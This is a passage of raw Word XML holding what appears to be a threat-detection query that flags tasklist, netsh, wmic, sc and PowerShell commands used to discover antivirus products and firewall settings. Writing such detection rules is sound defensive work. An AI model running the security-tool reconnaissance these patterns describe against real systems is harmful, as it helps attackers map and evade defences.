          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>*" OR</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="0081210C" w:rsidR="0081210C" w:rsidP="0081210C" w:rsidRDefault="0081210C" w14:paraId="65BEC143"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w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>kaspersky</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>*" OR</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="0081210C" w:rsidR="0081210C" w:rsidP="0081210C" w:rsidRDefault="0081210C" w14:paraId="620924FE"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="*sentinel*" OR</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="0081210C" w:rsidR="0081210C" w:rsidP="0081210C" w:rsidRDefault="0081210C" w14:paraId="13DD1591"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 xml:space="preserve">="* 'virus </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>cb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> defender </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>cylance</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> mc'*" OR</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="0081210C" w:rsidR="0081210C" w:rsidP="0081210C" w:rsidRDefault="0081210C" w14:paraId="239127BB"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="*385201*"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="0081210C" w:rsidR="0081210C" w:rsidP="0081210C" w:rsidRDefault="0081210C" w14:paraId="12ADF26D"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
    <w:p w:rsidRPr="0081210C" w:rsidR="0081210C" w:rsidP="0081210C" w:rsidRDefault="0081210C" w14:paraId="3639E9A2" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  ) OR</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="0081210C" w:rsidR="0081210C" w:rsidP="0081210C" w:rsidRDefault="0081210C" w14:paraId="66C4C1DE" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidRPr="0081210C" w:rsidR="0081210C" w:rsidP="0081210C" w:rsidRDefault="0081210C" w14:paraId="254E4F92" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidRPr="0081210C" w:rsidR="0081210C" w:rsidP="0081210C" w:rsidRDefault="0081210C" w14:paraId="484F596C"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
    <w:p w:rsidRPr="0081210C" w:rsidR="0081210C" w:rsidP="0081210C" w:rsidRDefault="0081210C" w14:paraId="272665B8" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    Image="*\\tasklist.exe"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="0081210C" w:rsidR="0081210C" w:rsidP="0081210C" w:rsidRDefault="0081210C" w14:paraId="07190363" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    OR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w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>tasklist</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>* | *</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>findstr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>*"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="0081210C" w:rsidR="0081210C" w:rsidP="0081210C" w:rsidRDefault="0081210C" w14:paraId="65A3A1A3" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  ) OR</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="0081210C" w:rsidR="0081210C" w:rsidP="0081210C" w:rsidRDefault="0081210C" w14:paraId="517CDEA7" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidRPr="0081210C" w:rsidR="0081210C" w:rsidP="0081210C" w:rsidRDefault="0081210C" w14:paraId="3E7690D9" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidRPr="0081210C" w:rsidR="0081210C" w:rsidP="0081210C" w:rsidRDefault="0081210C" w14:paraId="659FA90D"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
    <w:p w:rsidRPr="0081210C" w:rsidR="0081210C" w:rsidP="0081210C" w:rsidRDefault="0081210C" w14:paraId="392537DB" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    Image="*\\netsh.exe"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="0081210C" w:rsidR="0081210C" w:rsidP="0081210C" w:rsidRDefault="0081210C" w14:paraId="63DCA81E" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    AND (</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="0081210C" w:rsidR="0081210C" w:rsidP="0081210C" w:rsidRDefault="0081210C" w14:paraId="232A85C1"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w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>advfirewall</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>*" OR</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="0081210C" w:rsidR="0081210C" w:rsidP="0081210C" w:rsidRDefault="0081210C" w14:paraId="315A0472"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="*firewall show*" OR</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="0081210C" w:rsidR="0081210C" w:rsidP="0081210C" w:rsidRDefault="0081210C" w14:paraId="65696041"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 xml:space="preserve">="*show </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>allprofiles</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>*" OR</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="0081210C" w:rsidR="0081210C" w:rsidP="0081210C" w:rsidRDefault="0081210C" w14:paraId="169E8B76"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="*firewall dump*" OR</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="0081210C" w:rsidR="0081210C" w:rsidP="0081210C" w:rsidRDefault="0081210C" w14:paraId="5B58EC48"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w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>currentprofile</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>*" OR</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="0081210C" w:rsidR="0081210C" w:rsidP="0081210C" w:rsidRDefault="0081210C" w14:paraId="7D6D6BC1"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="*rule name=all*" OR</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="0081210C" w:rsidR="0081210C" w:rsidP="0081210C" w:rsidRDefault="0081210C" w14:paraId="69CBD701"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="*set rule*" OR</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="0081210C" w:rsidR="0081210C" w:rsidP="0081210C" w:rsidRDefault="0081210C" w14:paraId="4C041FFF"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="*show config*" OR</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="0081210C" w:rsidR="0081210C" w:rsidP="0081210C" w:rsidRDefault="0081210C" w14:paraId="554C6349"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="*show state*"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="0081210C" w:rsidR="0081210C" w:rsidP="0081210C" w:rsidRDefault="0081210C" w14:paraId="6E89C5B4"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
    <w:p w:rsidRPr="0081210C" w:rsidR="0081210C" w:rsidP="0081210C" w:rsidRDefault="0081210C" w14:paraId="36727098" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  ) OR</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="0081210C" w:rsidR="0081210C" w:rsidP="0081210C" w:rsidRDefault="0081210C" w14:paraId="5F5647C4" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidRPr="0081210C" w:rsidR="0081210C" w:rsidP="0081210C" w:rsidRDefault="0081210C" w14:paraId="0C0C0E29" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidRPr="0081210C" w:rsidR="0081210C" w:rsidP="0081210C" w:rsidRDefault="0081210C" w14:paraId="4587FA35"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
    <w:p w:rsidRPr="0081210C" w:rsidR="0081210C" w:rsidP="0081210C" w:rsidRDefault="0081210C" w14:paraId="0C96AFC1" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    Image="*\\wmic.exe"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="0081210C" w:rsidR="0081210C" w:rsidP="0081210C" w:rsidRDefault="0081210C" w14:paraId="0BE13331" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    AND (</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="0081210C" w:rsidR="0081210C" w:rsidP="0081210C" w:rsidRDefault="0081210C" w14:paraId="59759B7E"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w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>AntiVirusProduct</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>*" OR</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="0081210C" w:rsidR="0081210C" w:rsidP="0081210C" w:rsidRDefault="0081210C" w14:paraId="0FDB0F90"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="*SecurityCenter2*" OR</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="0081210C" w:rsidR="0081210C" w:rsidP="0081210C" w:rsidRDefault="0081210C" w14:paraId="61F0B22B"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w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>MSFT_MpPreference</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>*"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="0081210C" w:rsidR="0081210C" w:rsidP="0081210C" w:rsidRDefault="0081210C" w14:paraId="69F017ED"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
    <w:p w:rsidRPr="0081210C" w:rsidR="0081210C" w:rsidP="0081210C" w:rsidRDefault="0081210C" w14:paraId="3AD2C60D" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  ) OR</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="0081210C" w:rsidR="0081210C" w:rsidP="0081210C" w:rsidRDefault="0081210C" w14:paraId="4304AA3A" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidRPr="0081210C" w:rsidR="0081210C" w:rsidP="0081210C" w:rsidRDefault="0081210C" w14:paraId="2503542E" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidRPr="0081210C" w:rsidR="0081210C" w:rsidP="0081210C" w:rsidRDefault="0081210C" w14:paraId="0BC12BC6"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
    <w:p w:rsidRPr="0081210C" w:rsidR="0081210C" w:rsidP="0081210C" w:rsidRDefault="0081210C" w14:paraId="0CB91437" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    Image="*\\sc.exe"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="0081210C" w:rsidR="0081210C" w:rsidP="0081210C" w:rsidRDefault="0081210C" w14:paraId="334927D2" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    AND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="*query*"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="0081210C" w:rsidR="0081210C" w:rsidP="0081210C" w:rsidRDefault="0081210C" w14:paraId="188972B7" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    AND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w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>windefend</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>*"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="0081210C" w:rsidR="0081210C" w:rsidP="0081210C" w:rsidRDefault="0081210C" w14:paraId="6C029EA2" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  ) OR</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="0081210C" w:rsidR="0081210C" w:rsidP="0081210C" w:rsidRDefault="0081210C" w14:paraId="3B8CA9FB" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidRPr="0081210C" w:rsidR="0081210C" w:rsidP="0081210C" w:rsidRDefault="0081210C" w14:paraId="1E61E910" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidRPr="0081210C" w:rsidR="0081210C" w:rsidP="0081210C" w:rsidRDefault="0081210C" w14:paraId="2D36CD5A"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
    <w:p w:rsidRPr="0081210C" w:rsidR="0081210C" w:rsidP="0081210C" w:rsidRDefault="0081210C" w14:paraId="2A70B490" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    Image="*\\powershell.exe"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="0081210C" w:rsidR="0081210C" w:rsidP="0081210C" w:rsidRDefault="0081210C" w14:paraId="40CBBB00" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    AND (</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="0081210C" w:rsidR="0081210C" w:rsidP="0081210C" w:rsidRDefault="0081210C" w14:paraId="62D1BBCD"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="*Get-Process*" OR</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="0081210C" w:rsidR="0081210C" w:rsidP="0081210C" w:rsidRDefault="0081210C" w14:paraId="231E8848"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="*Get-Service*" OR</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="0081210C" w:rsidR="0081210C" w:rsidP="0081210C" w:rsidRDefault="0081210C" w14:paraId="655EFFB5"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="*Where-Object*" OR</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="0081210C" w:rsidR="0081210C" w:rsidP="0081210C" w:rsidRDefault="0081210C" w14:paraId="08849C86"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="*Get-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CimInstance</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>*" OR</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="0081210C" w:rsidR="0081210C" w:rsidP="0081210C" w:rsidRDefault="0081210C" w14:paraId="62756505"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="*Get-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>WmiObject</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
